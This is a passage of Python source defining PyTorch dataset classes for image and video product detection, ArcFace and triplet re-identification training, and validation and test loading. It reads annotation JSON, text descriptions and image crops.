                if len(d['annotations']) == 0:
                    continue
                t = []
                t.append(os.path.join(tats[i], d['img_name']))
                t.append(d['annotations'])
                t.append(d['img_name'])
                t.append(tats[i])
                self.images.append(t)
        # print(len(self.images))
        # self.images = self.images[:1000]
        print('Done')

    def __len__(self):
        return len(self.images)

    def __getitem__(self, index):
        imgPath, annotationsList, imgName, t = self.images[index]
        text_name = imgName.split('_')[0]
        text = self.textDic[t][text_name]
        text = torch.Tensor(text).long()

        img = cv2.imread(os.path.join(self.root_dir, imgPath))
        img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        img = img.astype(np.float32) / 255

        annotations = np.zeros((len(annotationsList), 6))
        for i, annotationDic in enumerate(annotationsList):
            annotation = np.zeros((1, 6))
            annotation[0, :4] = annotationDic['box']
            annotation[0, 4] = annotationDic['label']
            if annotationDic['instance_id'] > 0:
                annotation[0, 5] = 1
            else:
                annotation[0, 5] = 0
            annotations[i:i+1, :] = annotation
        # annotations = np.append(annotations, annotation, axis=0)

        sample = {'img': img, 'annot': annotations, 'text': text}
        if self.transform:
            sample = self.transform(sample)
        return sample

    def label2index(self, label):
        return self.labelDic['label2index'][label]

    def index2label(self, index):
        return self.labelDic['index2label'][str(index)]

    def getImagePath(self, index):
        imgPath, annotationsList, imgName, t = self.images[index]
        return imgPath

    def getImageInfo(self, index):
        imgPath, annotationsList, imgName, t = self.images[index]
        imgID, frame = imgName[:-4].split('_')
        return imgPath, imgID, frame
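`__getitem__` packs each annotation into a six-column row: the four box coordinates, the class label, and a flag marking whether the object has a positive `instance_id`. A pure-Python sketch of that layout, without the NumPy array (the helper name is illustrative):

```python
def annotations_to_rows(annotation_dicts):
    """Build [x1, y1, x2, y2, label, has_instance] rows, as __getitem__ does."""
    rows = []
    for ann in annotation_dicts:
        has_instance = 1 if ann['instance_id'] > 0 else 0
        rows.append(list(ann['box']) + [ann['label'], has_instance])
    return rows
```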
class EfficientdetDatasetVideo(Dataset):
    def __init__(self, root_dir='data', mode='train', imgORvdo='video',
                 transform=None, maxLen=64, PAD=0):
        assert mode in ['train', 'validation']
        assert imgORvdo in ['video']

        self.root_dir = root_dir
        self.transform = transform

        text2num = Text2Num(maxLen=maxLen, root_dir=root_dir, PAD=PAD)
        self.vocab_size = text2num.vocab_size

        label_file = 'label.json'
        with open(os.path.join(root_dir, label_file), 'r') as f:
            self.labelDic = json.load(f)

        self.num_classes = len(self.labelDic['label2index'])

        tats = [mode + '_videos']

        self.textDic = {}
        ds = []
        for t in tats:
            with open(os.path.join(root_dir, t + '_annotation.json'), 'r') as f:
                ds.append(json.load(f))
            with open(os.path.join(root_dir, t + '_text.json'), 'r') as f:
                self.textDic[t] = json.load(f)

        for k in self.textDic.keys():
            for kk in self.textDic[k].keys():
                self.textDic[k][kk] = text2num(self.textDic[k][kk])

        ls = [d['annotations'] for d in ds]

        self.images = []
        self.videos = {}
        print('Loading {} {} data...'.format(mode, imgORvdo))
        for i, l in enumerate(ls):
            for d in l:
                # group frames by video id (first 6 chars of the image name)
                if d['img_name'][:6] not in self.videos:
                    self.videos[d['img_name'][:6]] = []
                # if len(d['annotations']) == 0:
                #     continue
                t = []
                t.append(os.path.join(tats[i], d['img_name']))
                t.append(d['annotations'])
                t.append(d['img_name'])
                t.append(tats[i])
                self.videos[d['img_name'][:6]].append(t)
                # self.images.append(t)

        self.videos = list(self.videos.values())
        for l in self.videos:
            assert len(l) == 10
        # print(len(self.images))
        self.videos = self.videos[:100]
        print('Done')

    def __len__(self):
        return len(self.videos)

    def __getitem__(self, index):
        lst = self.videos[index]
        datas = []
        for imgPath, annotationsList, imgName, t in lst:
            text_name = imgName.split('_')[0]
            text = self.textDic[t][text_name]
            text = torch.Tensor(text).long()

            img = cv2.imread(os.path.join(self.root_dir, imgPath))
            img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
            img = img.astype(np.float32) / 255

            annotations = np.zeros((len(annotationsList), 6))
            for i, annotationDic in enumerate(annotationsList):
                annotation = np.zeros((1, 6))
                annotation[0, :4] = annotationDic['box']
                annotation[0, 4] = annotationDic['label']
                if annotationDic['instance_id'] > 0:
                    annotation[0, 5] = 1
                else:
                    annotation[0, 5] = 0
                annotations[i:i+1, :] = annotation

            sample = {'img': img, 'annot': annotations, 'text': text}
            datas.append(sample)

        if self.transform:
            datas = self.transform(datas)
        return datas
'''
for arcface
'''


class ArcfaceDataset(Dataset):
    def __init__(self, root_dir='data', mode='train', size=(112, 112), flip_x=0.5,
                 maxLen=64, PAD=0, imgORvdo='all'):
        assert mode in ['train', 'all']
        assert imgORvdo in ['all', 'image', 'video']

        mean = [0.55574415, 0.51230767, 0.51123354]
        aa_params = dict(
            translate_const=int(size[0] * 0.40),
            img_mean=tuple([min(255, round(255 * x)) for x in mean]),
        )
        self.randAug = rand_augment_transform('rand-m9-n3-mstd0.5', aa_params)

        self.root_dir = root_dir
        self.size = size
        self.flip_x = flip_x

        if mode == 'train':
            modes = ['train']
            instanceFile = 'instanceID.json'
        elif mode == 'train_2':
            modes = ['train', 'validation_2']
            instanceFile = 'instanceID_2.json'
        elif mode == 'all':
            modes = ['train', 'validation_2', 'validation']
            instanceFile = 'instanceID_all.json'

        with open(os.path.join(root_dir, instanceFile), 'r') as f:
            self.clsDic = json.load(f)
        with open(os.path.join(root_dir, 'instance2label.json'), 'r') as f:
            self.instance2label = json.load(f)

        text2num = Text2Num(maxLen=maxLen, root_dir=root_dir, PAD=PAD)
        self.vocab_size = text2num.vocab_size

        self.images = []
        self.textDics = {}
        for mode in modes:
            if imgORvdo == 'all':
                tats = [mode + '_images', mode + '_videos']
            elif imgORvdo == 'image':
                tats = [mode + '_images']
            elif imgORvdo == 'video':
                tats = [mode + '_videos']

            savePath = mode + '_instance'
            self.savePath = os.path.join(root_dir, savePath)

            d = []
            textDic = []
            for tat in tats:
                with open(os.path.join(root_dir, tat + '_annotation.json'), 'r') as f:
                    d.append(json.load(f))
                with open(os.path.join(root_dir, tat + '_text.json'), 'r') as f:
                    textDic.append(json.load(f))

            for i in range(len(textDic)):
                for k in textDic[i].keys():
                    textDic[i][k] = text2num(textDic[i][k])
            self.textDics[mode] = textDic

            l = [dd['annotations'] for dd in d]

            print('Loading data...')
            for i, ll in enumerate(l):
                for d in ll:
                    for dd in d['annotations']:
                        if dd['instance_id'] > 0 and str(dd['instance_id']) in self.clsDic.keys():
                            t = []
                            t.append(os.path.join(
                                self.savePath, str(dd['instance_id']),
                                tats[i] + str(dd['instance_id']) + d['img_name']))
                            t.append(dd['instance_id'])
                            t.append(d['img_name'].split('_')[0])
                            t.append(i)
                            t.append(mode)
                            self.images.append(t)

        self.num_classes = len(self.clsDic)
        self.num_labels = len(set(self.instance2label.values()))
        # self.images = self.images[:2222]
        print('Done')

        self.transform = transforms.Normalize(
            mean=[0.55574415, 0.51230767, 0.51123354],
            std=[0.21303795, 0.21604613, 0.21273348])

    def __len__(self):
        return len(self.images)

    def __getitem__(self, index):
        imgName, instance_id, textName, iORv, mode = self.images[index]
        img = np.load(imgName[:-4] + '.npy')
        # img = cv2.imread(imgName[:-4] + '.jpg')
        # img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        # img = img.astype(np.float32) / 255

        # '''randAug'''
        # img = Image.fromarray(np.uint8(img * 255))
        # img = self.randAug(img)
        # img = np.array(img)
        # img = img.astype(np.float32) / 255
        # '''randAug'''

        text = self.textDics[mode][iORv][textName]
        text = torch.tensor(text).long()
        iORv = torch.tensor(iORv).long()

        # random 256x256 crop, then resize to the target size
        h, w, c = img.shape
        rh = random.randint(0, h - 256)
        rw = random.randint(0, w - 256)
        img = img[rh:256+rh, rw:256+rw, :]
        img = cv2.resize(img, self.size)

        # '''random erasing'''
        # if np.random.rand() < 0.5:
        #     w = h = 256
        #     while w >= 256 or h >= 256:
        #         r = np.random.uniform(0.3, 1/0.3)
        #         s = 256*256*np.random.uniform(0.02, 0.4)
        #         w = int(np.sqrt(s*r))
        #         h = int(np.sqrt(s/r))
        #     s_w = random.randint(0, 256-w)
        #     s_h = random.randint(0, 256-h)
        #     img[s_h:s_h+h, s_w:s_w+w, :] = 0

        instance = torch.tensor(self.clsDic[str(instance_id)])
        label = torch.tensor(self.instance2label[str(instance_id)])

        if np.random.rand() < self.flip_x:
            img = img[:, ::-1, :].copy()

        img = torch.from_numpy(img)
        img = img.permute(2, 0, 1)
        img = self.transform(img)

        return {'img': img, 'instance': instance, 'label': label, 'text': text, 'iORv': iORv}
class ArcfaceDatasetSeparate(Dataset):
    def __init__(self, root_dir='data', mode='train', size=(112, 112), flip_x=0.5,
                 maxLen=64, PAD=0, imgORvdo='all'):
        assert mode in ['train']
        assert imgORvdo in ['all']

        self.root_dir = root_dir
        self.size = size
        self.flip_x = flip_x

        if imgORvdo == 'all':
            tats = [mode + '_images', mode + '_videos']
        elif imgORvdo == 'image':
            tats = [mode + '_images']
        elif imgORvdo == 'video':
            tats = [mode + '_videos']

        savePath = mode + '_instance'
        self.savePath = os.path.join(root_dir, savePath)

        text2num = Text2Num(maxLen=maxLen, root_dir=root_dir, PAD=PAD)
        self.vocab_size = text2num.vocab_size

        d = []
        self.textDic = []
        for tat in tats:
            with open(os.path.join(root_dir, tat + '_annotation.json'), 'r') as f:
                d.append(json.load(f))
            with open(os.path.join(root_dir, tat + '_text.json'), 'r') as f:
                self.textDic.append(json.load(f))

        for i in range(len(self.textDic)):
            for k in self.textDic[i].keys():
                self.textDic[i][k] = text2num(self.textDic[i][k])

        l = [dd['annotations'] for dd in d]

        self.images = []

        with open(os.path.join(root_dir, 'instanceID.json'), 'r') as f:
            self.clsDic = json.load(f)
        with open(os.path.join(root_dir, 'instance2label.json'), 'r') as f:
            self.instance2label = json.load(f)

        names = ['image', 'video']
        print('Loading data...')
        for i, ll in enumerate(l):
            for d in ll:
                for dd in d['annotations']:
                    if dd['instance_id'] > 0 and str(dd['instance_id']) in self.clsDic.keys():
                        t = []
                        t.append(os.path.join(
                            str(dd['instance_id']),
                            tats[i] + str(dd['instance_id']) + d['img_name']))
                        t.append(dd['instance_id'])
                        t.append(d['img_name'].split('_')[0])
                        t.append(names[i])
                        self.images.append(t)

        self.num_classes = len(self.clsDic)
        self.num_labels = len(set(self.instance2label.values()))

        # group crop indices per instance, split by image/video source
        self.dic = {}
        for i in range(len(self.images)):
            imgName, instance_id, textName, iORv = self.images[i]
            if instance_id not in self.dic:
                self.dic[instance_id] = {}
                self.dic[instance_id]['image'] = []
                self.dic[instance_id]['video'] = []
            self.dic[instance_id][iORv].append(i)

        # drop instances lacking either an image or a video crop;
        # iterate over a copy of the keys so deletion is safe
        for k in list(self.dic.keys()):
            if len(self.dic[k]['image']) == 0 or len(self.dic[k]['video']) == 0:
                del self.dic[k]

        self.dic = list(self.dic.items())
        # self.images = self.images[:2222]
        print('Done')

        self.transform = transforms.Normalize(
            mean=[0.55574415, 0.51230767, 0.51123354],
            std=[0.21303795, 0.21604613, 0.21273348])

    def __len__(self):
        return len(self.dic)

    def __getitem__(self, index):
        imgIndex = random.choice(self.dic[index][1]['image'])
        vdoIndex = random.choice(self.dic[index][1]['video'])

        sample = []
        instances = []
        for idx in [imgIndex, vdoIndex]:
            imgName, instance_id, textName, iORv = self.images[idx]
            img = np.load(os.path.join(self.savePath, imgName)[:-4] + '.npy')

            # random crop of at least 224x224, then resize to the target size
            h, w, c = img.shape
            rh_1 = random.randint(0, h - 224)
            rh_2 = random.randint(224, h)
            rw_1 = random.randint(0, w - 224)
            rw_2 = random.randint(224, w)
            img = img[rh_1:rh_2, rw_1:rw_2, :]
            img = cv2.resize(img, self.size)

            instances.append(torch.tensor(self.clsDic[str(instance_id)]))

            if np.random.rand() < self.flip_x:
                img = img[:, ::-1, :].copy()

            img = torch.from_numpy(img)
            img = img.permute(2, 0, 1)
            img = self.transform(img)
            sample.append(img)

        assert instances[0] == instances[1]
        return {'img': sample[0], 'vdo': sample[1], 'instance': instances[0]}
class TripletDataset(Dataset):
    def __init__(self, root_dir='data', mode='train', size=(112, 112), flip_x=0.5):
        assert mode in ['train']
        self.root_dir = root_dir
        self.size = size
        self.flip_x = flip_x
        img_tat = mode + '_images'
        vdo_tat = mode + '_videos'
        savePath = mode + '_instance'
        self.savePath = os.path.join(root_dir, savePath)
        with open(os.path.join(root_dir, img_tat+'_annotation.json'), 'r') as f:
            d_i = json.load(f)
        with open(os.path.join(root_dir, vdo_tat+'_annotation.json'), 'r') as f:
            d_v = json.load(f)
        with open(os.path.join(root_dir, 'instanceID.json'), 'r') as f:
            self.clsDic = json.load(f)
        with open(os.path.join(root_dir, 'instance2label.json'), 'r') as f:
            instance2label = json.load(f)
        l_i = d_i['annotations']
        l_v = d_v['annotations']
        self.images = []
        print('Loading data...')
        for d in l_i:
            for dd in d['annotations']:
                if dd['instance_id'] > 0 and str(dd['instance_id']) in self.clsDic.keys():
                    t = []
                    t.append(os.path.join(str(dd['instance_id']), img_tat+str(dd['instance_id'])+d['img_name']))
                    t.append(self.clsDic[str(dd['instance_id'])])
                    t.append(instance2label[str(dd['instance_id'])])
                    self.images.append(t)
        for d in l_v:
            for dd in d['annotations']:
                if dd['instance_id'] > 0 and str(dd['instance_id']) in self.clsDic.keys():
                    t = []
                    t.append(os.path.join(str(dd['instance_id']), vdo_tat+str(dd['instance_id'])+d['img_name']))
                    t.append(self.clsDic[str(dd['instance_id'])])
                    t.append(instance2label[str(dd['instance_id'])])
                    self.images.append(t)
        self.num_classes = len(self.clsDic)
        self.num_labels = len(set(instance2label.values()))
        self.cls_ins_dic = {}
        for i, l in enumerate(self.images):
            imgName, instance_id, label = l
            if label not in self.cls_ins_dic:
                self.cls_ins_dic[label] = {}
            if instance_id not in self.cls_ins_dic[label]:
                self.cls_ins_dic[label][instance_id] = []
            self.cls_ins_dic[label][instance_id].append(i)
        for k in self.cls_ins_dic.keys():
            if len(self.cls_ins_dic[k]) < 2:
                raise RuntimeError('size of self.cls_ins_dic[k] must be larger than 1')
        print('Done')
        self.transform = transforms.Normalize(
            mean=[0.55574415, 0.51230767, 0.51123354],
            std=[0.21303795, 0.21604613, 0.21273348])

    def __len__(self):
        return len(self.images)

    def __getitem__(self, index):
        imgName_q, instance_id_q, label_q = self.images[index]
        p_index = index
        while p_index == index:
            p_index = random.choice(self.cls_ins_dic[label_q][instance_id_q])
        instance_id_n = instance_id_q
        while instance_id_n == instance_id_q:
            instance_id_n = random.choice(list(self.cls_ins_dic[label_q].keys()))
        n_index = random.choice(self.cls_ins_dic[label_q][instance_id_n])
        imgName_p, instance_id_p, label_p = self.images[p_index]
        imgName_n, instance_id_n, label_n = self.images[n_index]
        assert len(set([label_q, label_p, label_n])) == 1
        assert len(set([instance_id_q, instance_id_p])) == 1
        instance_id_q = torch.tensor(instance_id_q)
        instance_id_p = torch.tensor(instance_id_p)
        instance_id_n = torch.tensor(instance_id_n)
        img_q = np.load(os.path.join(self.savePath, imgName_q)[:-4]+'.npy')
        img_p = np.load(os.path.join(self.savePath, imgName_p)[:-4]+'.npy')
        img_n = np.load(os.path.join(self.savePath, imgName_n)[:-4]+'.npy')
        hq, wq, cq = img_q.shape
        hp, wp, cp = img_p.shape
        hn, wn, cn = img_n.shape
        rh = random.randint(0, hq-self.size[0])
        rw = random.randint(0, wq-self.size[1])
        img_q = img_q[rh:self.size[0]+rh, rw:self.size[1]+rw, :]
        rh = random.randint(0, hp-self.size[0])
        rw = random.randint(0, wp-self.size[1])
        img_p = img_p[rh:self.size[0]+rh, rw:self.size[1]+rw, :]
        rh = random.randint(0, hn-self.size[0])
        rw = random.randint(0, wn-self.size[1])
        img_n = img_n[rh:self.size[0]+rh, rw:self.size[1]+rw, :]
        if np.random.rand() < self.flip_x:
            img_q = img_q[:, ::-1, :].copy()
        if np.random.rand() < self.flip_x:
            img_p = img_p[:, ::-1, :].copy()
        if np.random.rand() < self.flip_x:
            img_n = img_n[:, ::-1, :].copy()
        img_q = torch.from_numpy(img_q).permute(2, 0, 1)
        img_p = torch.from_numpy(img_p).permute(2, 0, 1)
        img_n = torch.from_numpy(img_n).permute(2, 0, 1)
        img_q = self.transform(img_q)
        img_p = self.transform(img_p)
        img_n = self.transform(img_n)
        return {
            'img_q': img_q,
            'img_p': img_p,
            'img_n': img_n,
            'img_q_instance': instance_id_q,
            'img_p_instance': instance_id_p,
            'img_n_instance': instance_id_n,
        }
class HardTripletDataset(Dataset):
    def __init__(self, root_dir='data', mode='train', size=(112, 112), flip_x=0.5, n_samples=4):
        assert mode in ['train', 'all', 'train_2']
        mean = [0.55574415, 0.51230767, 0.51123354]
        aa_params = dict(
            translate_const=int(size[0] * 0.40),
            img_mean=tuple([min(255, round(255 * x)) for x in mean]),
        )
        self.randAug = rand_augment_transform('rand-m9-n3-mstd0.5', aa_params)
        self.root_dir = root_dir
        self.size = size
        self.flip_x = flip_x
        self.n_samples = n_samples
        if mode == 'train':
            modes = ['train']
            instanceFile = 'instanceID.json'
        elif mode == 'train_2':
            modes = ['train', 'validation_2']
            instanceFile = 'instanceID_2.json'
        elif mode == 'all':
            modes = ['train', 'validation_2', 'validation']
            instanceFile = 'instanceID_all.json'
        with open(os.path.join(root_dir, instanceFile), 'r') as f:
            self.clsDic = json.load(f)
        self.samples = {}
        for mode in modes:
            img_tat = mode + '_images'
            vdo_tat = mode + '_videos'
            savePath = mode + '_instance'
            savePath = os.path.join(root_dir, savePath)
            with open(os.path.join(root_dir, img_tat+'_annotation.json'), 'r') as f:
                d_i = json.load(f)
            with open(os.path.join(root_dir, vdo_tat+'_annotation.json'), 'r') as f:
                d_v = json.load(f)
            l_i = d_i['annotations']
            l_v = d_v['annotations']
            print('Loading data...')
            for d in l_i:
                for dd in d['annotations']:
                    if dd['instance_id'] > 0 and str(dd['instance_id']) in self.clsDic.keys():
                        instance = self.clsDic[str(dd['instance_id'])]
                        if instance not in self.samples:
                            self.samples[instance] = []
                        self.samples[instance].append(
                            os.path.join(savePath, str(dd['instance_id']), img_tat+str(dd['instance_id'])+d['img_name']))
            for d in l_v:
                for dd in d['annotations']:
                    if dd['instance_id'] > 0 and str(dd['instance_id']) in self.clsDic.keys():
                        instance = self.clsDic[str(dd['instance_id'])]
                        if instance not in self.samples:
                            self.samples[instance] = []
                        self.samples[instance].append(
                            os.path.join(savePath, str(dd['instance_id']), vdo_tat+str(dd['instance_id'])+d['img_name']))
        self.num_classes = len(self.clsDic)
        for k in self.samples.keys():
            while len(self.samples[k]) < n_samples:
                self.samples[k] *= 2
            assert len(self.samples[k]) >= n_samples
        self.instances = list(self.samples.keys())
        print('Done')
        self.transform = transforms.Normalize(
            mean=[0.55574415, 0.51230767, 0.51123354],
            std=[0.21303795, 0.21604613, 0.21273348])

    def __len__(self):
        return len(self.instances)

    def __getitem__(self, index):
        instance = self.instances[index]
        imgPaths = random.sample(self.samples[instance], self.n_samples)
        imgs = []
        instances = []
        for imgPath in imgPaths:
            img = np.load(imgPath[:-4]+'.npy')
            # '''randAug'''
            # img = Image.fromarray(np.uint8(img*255))
            # img = self.randAug(img)
            # img.save('aaa.jpg')
            # img = np.array(img)
            # img = img.astype(np.float32) / 255
            # '''randAug'''
            assert self.size[0] == 256
            if self.size[0] != 256:
                r = 256 / self.size[0]
                img = cv2.resize(img, (int(270/r), int(270/r)))
            h, w, c = img.shape
            rh = random.randint(0, h-self.size[0])
            rw = random.randint(0, w-self.size[1])
            img = img[rh:self.size[0]+rh, rw:self.size[1]+rw, :]
            # if np.random.rand() < 0.5:
            #     w = h = 256
            #     while w >= 256 or h >= 256:
            #         r = np.random.uniform(0.3, 1/0.3)
            #         s = 256*256*np.random.uniform(0.02, 0.4)
            #         w = int(np.sqrt(s*r))
            #         h = int(np.sqrt(s/r))
            #     s_w = random.randint(0, 256-w)
            #     s_h = random.randint(0, 256-h)
            #     img[s_h:s_h+h, s_w:s_w+w, :] = 0
            instance_t = torch.tensor(instance)
            if np.random.rand() < self.flip_x:
                img = img[:, ::-1, :].copy()
            img = torch.from_numpy(img)
            img = img.permute(2, 0, 1)
            img = self.transform(img)
            imgs.append(img)
            instances.append(instance_t)
        imgs = torch.stack(imgs, dim=0)
        instances = torch.stack(instances, dim=0)
        return {'img': imgs, 'instance': instances}
'''
for validation
'''
class ValidationArcfaceDataset(Dataset):
    def __init__(self, size=(112, 112), root_dir='data/validation_instance/', maxLen=64, PAD=0):
        self.root_dir = root_dir
        self.size = size
        text2num = Text2Num(maxLen=maxLen, root_dir='data', PAD=PAD)
        self.vocab_size = text2num.vocab_size
        img_tat = 'validation_images'
        vdo_tat = 'validation_videos'
        with open(os.path.join('data', img_tat+'_text.json'), 'r') as f:
            self.textDic_i = json.load(f)
        with open(os.path.join('data', vdo_tat+'_text.json'), 'r') as f:
            self.textDic_v = json.load(f)
        for k in self.textDic_i.keys():
            self.textDic_i[k] = text2num(self.textDic_i[k])
        for k in self.textDic_v.keys():
            self.textDic_v[k] = text2num(self.textDic_v[k])
        instances = os.listdir(root_dir)
        self.items = []
        # s = ''
        print('Loading Data...')
        for instance in tqdm(instances):
            imgs = os.listdir(root_dir+instance)
            if len(imgs) < 2:
                continue
            l = []
            for img in imgs:
                if 'images' in img:
                    l.append(os.path.join(instance, img))
                    text_name = img.split(instance)[-1].split('_')[0]
                    l.append(text_name)
                    break
            if len(l) == 0:
                continue
            for img in imgs:
                if 'videos' in img:
                    l.append(os.path.join(instance, img))
                    text_name = img.split(instance)[-1].split('_')[0]
                    l.append(text_name)
                    break
            if len(l) < 4:
                continue
            l.append(instance)
            # s += '{}\t{}\n'.format(l[0], l[2])
            self.items.append(l)
        # with open('validation_path.txt', 'w') as f:
        #     f.write(s)
        self.length = len(self.items)
        print('Done')
        self.transform = transforms.Normalize(
            mean=[0.55574415, 0.51230767, 0.51123354],
            std=[0.21303795, 0.21604613, 0.21273348])

    def __len__(self):
        return len(self.items) * 2

    def __getitem__(self, index):
        imgPath, textName_img, vdoPath, textName_vdo, instance = self.items[index % self.length]
        img_text = self.textDic_i[textName_img]
        vdo_text = self.textDic_v[textName_vdo]
        img_text = torch.Tensor(img_text).long()
        vdo_text = torch.Tensor(vdo_text).long()
        # img = np.load(os.path.join(self.root_dir, imgPath))
        # vdo = np.load(os.path.join(self.root_dir, vdoPath))
        img = cv2.imread(os.path.join(self.root_dir, imgPath))
        vdo = cv2.imread(os.path.join(self.root_dir, vdoPath))
        img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        img = img.astype(np.float32) / 255
        vdo = cv2.cvtColor(vdo, cv2.COLOR_BGR2RGB)
        vdo = vdo.astype(np.float32) / 255
        hi, wi, ci = img.shape
        hv, wv, cv = vdo.shape
        if self.size[0] != 256:
            r = 256 / self.size[0]
            # cv2.resize expects dsize as (width, height), so pass width first
            img = cv2.resize(img, (int(wi/r), int(hi/r)))
            vdo = cv2.resize(vdo, (int(wv/r), int(hv/r)))
            hi, wi, ci = img.shape
            hv, wv, cv = vdo.shape
        rh = (hi-self.size[0])//2
        rw = (wi-self.size[1])//2
        img = img[rh:self.size[0]+rh, rw:self.size[1]+rw, :]
        rh = (hv-self.size[0])//2
        rw = (wv-self.size[1])//2
        vdo = vdo[rh:self.size[0]+rh, rw:self.size[1]+rw, :]
        if index >= self.length:
            img = img[:, ::-1, :].copy()
            vdo = vdo[:, ::-1, :].copy()
        img = torch.from_numpy(img)
        img = img.permute(2, 0, 1)
        vdo = torch.from_numpy(vdo)
        vdo = vdo.permute(2, 0, 1)
        img = self.transform(img)
        vdo = self.transform(vdo)
        return {
            'img': img,
            'vdo': vdo,
            'img_text': img_text,
            'vdo_text': vdo_text,
            'instance': instance,
            'img_e': torch.tensor(0),
            'vdo_e': torch.tensor(1)
        }
class ValidationDataset(Dataset):
    def __init__(self, root_dir, items, size):
        self.size = size
        self.root_dir = root_dir
        self.imgPath = None
        self.img = None
        self.items = items
        self.transform = transforms.Normalize(
            mean=[0.55574415, 0.51230767, 0.51123354],
            std=[0.21303795, 0.21604613, 0.21273348])

    def __len__(self):
        return len(self.items)

    def __getitem__(self, index):
        frame, imgID, imgPath, xmin, ymin, xmax, ymax, classes = self.items[index]
        if imgPath != self.imgPath:
            self.imgPath = imgPath
            self.img = cv2.imread(os.path.join(self.root_dir, imgPath))
        det = self.img[ymin:ymax, xmin:xmax, :].copy()
        det = cv2.resize(det, self.size)
        det = cv2.cvtColor(det, cv2.COLOR_BGR2RGB)
        det = det.astype(np.float32) / 255
        det = torch.from_numpy(det)
        det = det.permute(2, 0, 1)
        det = self.transform(det)
        # print(classes)
        return {
            'img': det,
            'imgID': imgID,
            'frame': frame,
            'box': np.array([xmin, ymin, xmax, ymax]),
            'classes': classes}
'''
for test
'''
class TestImageDataset(Dataset):
    def __init__(self, root_dir='data', dir_list=['validation_dataset_part1', 'validation_dataset_part2'], transform=None, maxLen=64, PAD=0):
        self.root_dir = root_dir
        self.transform = transform
        self.mode = 'image'
        label_file = 'label.json'
        with open(os.path.join(root_dir, label_file), 'r') as f:
            self.labelDic = json.load(f)
        self.num_classes = len(self.labelDic['label2index'])
        dirs = [os.path.join(root_dir, d) for d in dir_list]
        text2num = Text2Num(maxLen=maxLen, PAD=PAD)
        self.vocab_size = text2num.vocab_size
        self.images = []
        self.ids = []
        self.frames = []
        self.textDic = {}
        for di in dirs:
            img_dir_list = os.listdir(os.path.join(di, 'image'))
            for img_dir in img_dir_list:
                img_names = os.listdir(os.path.join(di, 'image', img_dir))
                for img_name in img_names:
                    self.images.append(os.path.join(di, 'image', img_dir, img_name))
                    self.frames.append(img_name.split('.')[0])
                    self.ids.append(img_dir)
                textPath = os.path.join(di, 'image_text', img_dir+'.txt')
                with open(textPath, 'r') as f:
                    self.textDic[img_dir] = text2num(f.readline())
        # self.images = self.images[:100]

    def __len__(self):
        return len(self.images)

    def __getitem__(self, index):
        imgPath = self.images[index]
        img = cv2.imread(imgPath)
        img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        img = img.astype(np.float32) / 255
        img_id = self.ids[index]
        text = self.textDic[img_id]
        text = torch.Tensor(text).long()
        sample = {'img': img, 'text': text}
        if self.transform:
            sample = self.transform(sample)
        return sample

    def getImageInfo(self, index):
        imgPath = self.images[index]
        img_id = self.ids[index]
        frame = self.frames[index]
        return imgPath, img_id, frame
# class TestVideoDataset(Dataset):
# def __init__(self, root_dir, transform=None, n=20, maxLen=64, PAD=0):
# self.root_dir = root_dir
# self.transform = transform
# self.n = n
# self.mode = 'video'
# label_file = 'label.json'
# with open(label_file, 'r') as f:
# self.labelDic = json.load(f)
# self.num_classes = len(self.labelDic['label2index'])
# text2num = Text2Num(maxLen=maxLen, PAD=PAD)
# self.vocab_size = text2num.vocab_size
# # gap = 400 // n
# # self.frames_ids = [i*gap for i in range(n)]
# self.videos = []
# self.ids = []
# self.textDic = {}
# vdo_names = os.listdir(os.path.join(root_dir, 'video'))
# for vdo_name in vdo_names:
# self.videos.append(os.path.join(root_dir, 'video', vdo_name))
# self.ids.append(vdo_name.split('.')[0])
# textPath = os.path.join(root_dir, 'video_text', vdo_name.split('.')[0]+'.txt')
# with open(textPath, 'r') as f:
# self.textDic[vdo_name.split('.')[0]] = text2num(f.readline())
# # self.videos = self.videos[:100]
# def __len__(self):
# return len(self.videos)*self.n
# def __getitem__(self, index):
# v_index = index // self.n
# # f_index = self.frames_ids[index % self.n]
# vdo_name = self.videos[v_index]
# cap = cv2.VideoCapture(vdo_name)
# frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
# f_index = int((frames // self.n) * (index % self.n))
# cap.set(cv2.CAP_PROP_POS_FRAMES, f_index)
# ret, img = cap.read()
# cap.release()
# vdo_id = self.ids[v_index]
# text = self.textDic[vdo_id]
# text = torch.tensor(text).long()
# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# img = img.astype(np.float32) / 255
# sample = {'img': img, 'text': text}
# if self.transform:
# sample = self.transform(sample)
# return sample
class TestVideoDataset(Dataset):
    def __init__(self, root_dir, transform=None, n=20, dir_list=['validation_dataset_part1', 'validation_dataset_part2'], maxLen=64, PAD=0):
        self.root_dir = root_dir
        self.transform = transform
        self.n = n
        self.mode = 'video'
        label_file = 'label.json'
        with open(os.path.join(root_dir, label_file), 'r') as f:
            self.labelDic = json.load(f)
        self.num_classes = len(self.labelDic['label2index'])
        text2num = Text2Num(maxLen=maxLen, PAD=PAD)
        self.vocab_size = text2num.vocab_size
        dirs = [os.path.join(root_dir, d) for d in dir_list]
        # gap = 400 // n
        # self.frames_ids = [i*gap for i in range(n)]
        self.videos = []
        self.ids = []
        self.textDic = {}
        for di in dirs:
            vdo_names = os.listdir(os.path.join(di, 'video'))
            for vdo_name in vdo_names:
                self.videos.append(os.path.join(di, 'video', vdo_name))
                self.ids.append(vdo_name.split('.')[0])
                textPath = os.path.join(di, 'video_text', vdo_name.split('.')[0]+'.txt')
                with open(textPath, 'r') as f:
                    self.textDic[vdo_name.split('.')[0]] = text2num(f.readline())
        # self.videos = self.videos[:10]

    def __len__(self):
        return len(self.videos)*self.n

    def __getitem__(self, index):
        v_index = index // self.n
        # f_index = self.frames_ids[index % self.n]
        vdo_name = self.videos[v_index]
        cap = cv2.VideoCapture(vdo_name)
        frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
        f_index = int((frames // self.n) * (index % self.n))
        cap.set(cv2.CAP_PROP_POS_FRAMES, f_index)
        ret, img = cap.read()
        cap.release()
        vdo_id = self.ids[v_index]
        text = self.textDic[vdo_id]
        text = torch.Tensor(text).long()
        img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        img = img.astype(np.float32) / 255
        sample = {'img': img, 'text': text}
        if self.transform:
            sample = self.transform(sample)
        return sample

    def getImageInfo(self, index):
        v_index = index // self.n
